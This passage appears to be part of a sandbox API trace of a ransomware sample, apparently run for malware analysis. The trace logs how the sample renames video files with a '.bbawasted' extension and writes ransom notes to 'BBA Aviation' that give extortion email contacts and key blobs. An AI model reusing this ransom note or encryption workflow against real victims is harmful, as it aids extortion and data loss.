lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0228.973] SetEndOfFile (hFile=0x28c) returned 1 [0228.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.975] CloseHandle (hObject=0x28c) returned 1 [0228.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0228.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0228.976] _aulldvrm () returned 0x0 [0228.976] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0228.977] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0228.977] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0228.977] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\AfS-2SkJMWAnsHGv.mkv") returned 84 [0228.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b2) returned 0x6bc8e0 [0228.977] lstrcpyW (in: lpString1=0x6bc988, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.977] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0228.977] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.977] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0228.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\AfS-2SkJMWAnsHGv.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\afs-2skjmwanshgv.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0228.979] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.980] SetEndOfFile (hFile=0x28c) returned 1 [0228.980] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.980] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.980] lstrcpyW (in: lpString1=0x6bc988, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\AfS-2SkJMWAnsHGv.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\afs-2skjmwanshgv.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\AfS-2SkJMWAnsHGv.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\afs-2skjmwanshgv.mkv.bbawasted")) returned 1 [0228.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\AfS-2SkJMWAnsHGv.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\afs-2skjmwanshgv.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0228.981] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0228.981] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x61df [0228.982] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61df) returned 0x5f0000 [0228.982] CloseHandle (hObject=0x27c) returned 1 [0228.983] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.983] CloseHandle (hObject=0x290) returned 1 [0228.983] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.983] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0228.984] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.984] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0228.984] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0228.984] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0228.984] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0229.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0229.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.244] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qgjxCuIj+E9O37vrKUa5/NG6SpHUoPUBl+pLQjqU7GUSfGqPm4FXXpvTe39E+sMC\r\n2jDoSXnQSKeEplqiptvV0Bnpyzcv43hh49+fhzuAd+GxtNheVwze6Wz9d9KB96Go\r\naRr0OvA+2KiGmC0t2fKixop1+lo9wa+H+twstLoxNT3paKfj1oqQo7gOi5I5mIZr\r\n8tN9YrRF43cwVemY6oSxFnE0BA8JZW6TCEZeWIybVX+n8WE1/axxu0DQTSUEUYo7\r\nwNCmIvQy3NVu3xxvQibtJOAYcH2yzP3UJKDX+2ZAeWweMiVsjwrTYd3IqFLMiFkE\r\nE89DozrLz0lzKEQ+nbbBG+ApMXCv/4OH6NYg7mpx4XiUr4yqwlTlf+skqKSbtzRi\r\nVDYHQj/KyuW4DMN7EzMis5a0KFr8KQpKSgx2q2kyeRw36m6GXVihApGysQA6enrJ\r\napoNQTMx/OLMHVFOpEOPlEFmb7DCvqJ3s8Pzfn4MRlOAyP4y/yEpyQS4AvLo729a\r\n2E6BCwN4IL9hGJcWoPNfBM07YFd+g+Uan3oO+gc+uC020Xjd5K+UUvnr3sEP2hWP\r\n/EL4bLFWSq4/tv3UNJXXMUXbRP79k0VkUzVIdpIKS4tphWViyf2BllvIbRyDJLtg\r\nmiQCmKeATEyQjk5nsAoIBQUqRBzvMjj0XjrS7NoIO50=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.244] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0229.244] SetEndOfFile (hFile=0x28c) returned 1 [0229.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.246] CloseHandle (hObject=0x28c) returned 1 [0229.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0229.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb260 | out: hHeap=0x660000) returned 1 [0229.247] _aulldvrm () returned 0x0 [0229.247] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0229.247] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0229.247] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0229.247] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\P4fCtkw.avi") returned 75 [0229.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a0) returned 0x6bc8e0 [0229.248] lstrcpyW (in: lpString1=0x6bc976, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.248] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6a38) returned 1 [0229.248] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0229.248] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0229.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\P4fCtkw.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\p4fctkw.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0229.250] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.251] SetEndOfFile (hFile=0x28c) returned 1 [0229.251] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.251] lstrcpyW (in: lpString1=0x6bc976, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\P4fCtkw.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\p4fctkw.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\P4fCtkw.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\p4fctkw.avi.bbawasted")) returned 1 [0229.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\P4fCtkw.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\p4fctkw.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.252] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0229.253] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xd1e2 [0229.253] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd1e2) returned 0x5f0000 [0229.253] CloseHandle (hObject=0x290) returned 1 [0229.254] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.255] CloseHandle (hObject=0x27c) returned 1 [0229.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.255] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0229.256] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.256] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0229.256] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0229.256] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0229.256] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0229.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0229.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.265] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mpK/98p2Ssdil+vp848Fl/me+lPAntqES404RiZtY2FbzPRp9oBg2jHcFFDDPZlE\r\nnCfYOgevl3mH96K82VS++r02yoVAycNMaVs9bD5wuJhHWljJmz2ntzBiBOughUdz\r\n+lbkC5bZNt4cgHKo5j/zF6EGQe02IWHWztozkqSHXJCV9CIRHThWYfIwj1XNKGrB\r\n8p37RP6XypwG4X7JD3dOJoYKa9kimEgQIxBTeYayU/Sc+AuMXZWmBTTBZbUQrHJJ\r\n24zHscQNUt+a8efkztgSxQCCgTlrhmJX9lUCy7BNLNAUX35Loc7rChvnljLjI9mp\r\nN2fwmp6uQ65bTPQ3IkVdkKrqwa9At3I3huqdtpE5HRlgEPVFvKRXAPcyymkai4eS\r\ncV3rrwj+icwA93tctgsW5gSjDWjWsExSom7xdTo9hJdb64ZlNyz6Up7Lz+W9k2aQ\r\nWWSGPlOZX47K1E9/QQT7LTpn8riY3GRr7m9a0GTO1w1xWUecwV5499Stav24v/FA\r\nBV5iZUbFPxCLTCm2qLytyqdEFitS+jLf3iQcGk3+mrjjiRLEXQLSEJHBrMXPOYeE\r\nrUWiuZj4NYusWa1dtbfjxCO+/uJq5GIIlU/Pc9GVWJLlJQLrsb3D0W70HLAObgsm\r\nVfra1y5/yvCh/lhs92EnJskxVv7yOzS4yGeR2PmlhMG=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.266] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0229.266] SetEndOfFile (hFile=0x28c) returned 1 [0229.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.268] CloseHandle (hObject=0x28c) returned 1 [0229.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0229.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be8b8 | out: hHeap=0x660000) returned 1 [0229.269] _aulldvrm () returned 0x0 [0229.269] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0229.269] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0229.269] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0229.269] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\Pc6H25dw6AMJ.flv") returned 80 [0229.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2aa) returned 0x6bc8e0 [0229.270] lstrcpyW (in: lpString1=0x6bc980, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.270] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0229.446] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0229.446] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0229.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\Pc6H25dw6AMJ.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\pc6h25dw6amj.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0229.447] WriteFile (in: hFile=0x27c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.450] SetEndOfFile (hFile=0x27c) returned 1 [0229.450] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.450] lstrcpyW (in: lpString1=0x6bc980, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\Pc6H25dw6AMJ.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\pc6h25dw6amj.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\Pc6H25dw6AMJ.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\pc6h25dw6amj.flv.bbawasted")) returned 1 [0229.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\Pc6H25dw6AMJ.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\pc6h25dw6amj.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.452] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0229.452] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe4e2 [0229.452] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe4e2) returned 0x5f0000 [0229.452] CloseHandle (hObject=0x290) returned 1 [0229.454] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.455] CloseHandle (hObject=0x294) returned 1 [0229.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.455] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0229.456] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.456] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0229.456] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0229.457] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0229.457] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0229.467] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.467] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.467] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Sz5ROgxpIkAN1Gjxybb+TIb4AoCW3gEIrO4Cvmao1CEQgwIHN4SPq+MGgcXvODAP\r\nGHJsIv81vwBlJvl0cze39loYu2qjRrUTUtaPKguksf9M73EJ6d4j0/76hopp26Qd\r\nT40yU4xzMqRRsZowGR2lV4tZ51/I+2jAIepb3PG9UUsNt/rCwtiQ8lFVhxV+R161\r\nS014w+bASQdMdGcSFtS78ENxI4vqVt5BfFyCqkd/1soCfs23aseP2mrBdWdUpOld\r\nthAlUx5b/yVAUVnwQXwUvvcbPbLjXyOcirzaNUkwiolzqZLZHaBeoZCuwIVBSdG9\r\nIR9ohS//jYV9r6D5AKeMOxyG4E1kXhcHq7EsKgIDAf975TJvXhCOeVUAAOeFod47\r\ndPs4jL1nqRwtlsRf8BDycDD4gmIU8FxGNM/ZzViwuqkYrpGG4DVpYeRzqMQQY52T\r\nL7W/lYmcAcY36F9dxyuAu0FUdi4BEhJwGRSYccXHowVoR7LKkLuCfKkVyDPS3OXa\r\nh4t8U+w2kdxCN75/0kEZvQAkhiagiK5ruox0HdH6jBRpMt2j10Yiryg49lka/XTK\r\n34hDY0O1u+7Ud6/u/tIwdF8WHJDhE4uimmQm4oBYAoikFZuMoo65+ngYVbud4fAl\r\n2C8jQrLRZP3C0LiCxD2s6XFrNvO7zZnIME+Sa7mCjlC=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.468] WriteFile (in: hFile=0x27c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0229.468] SetEndOfFile (hFile=0x27c) returned 1 [0229.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.470] CloseHandle (hObject=0x27c) returned 1 [0229.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0229.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be9a8 | out: hHeap=0x660000) returned 1 [0229.471] _aulldvrm () returned 0x0 [0229.471] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0229.471] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0229.471] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0229.472] lstrlenW 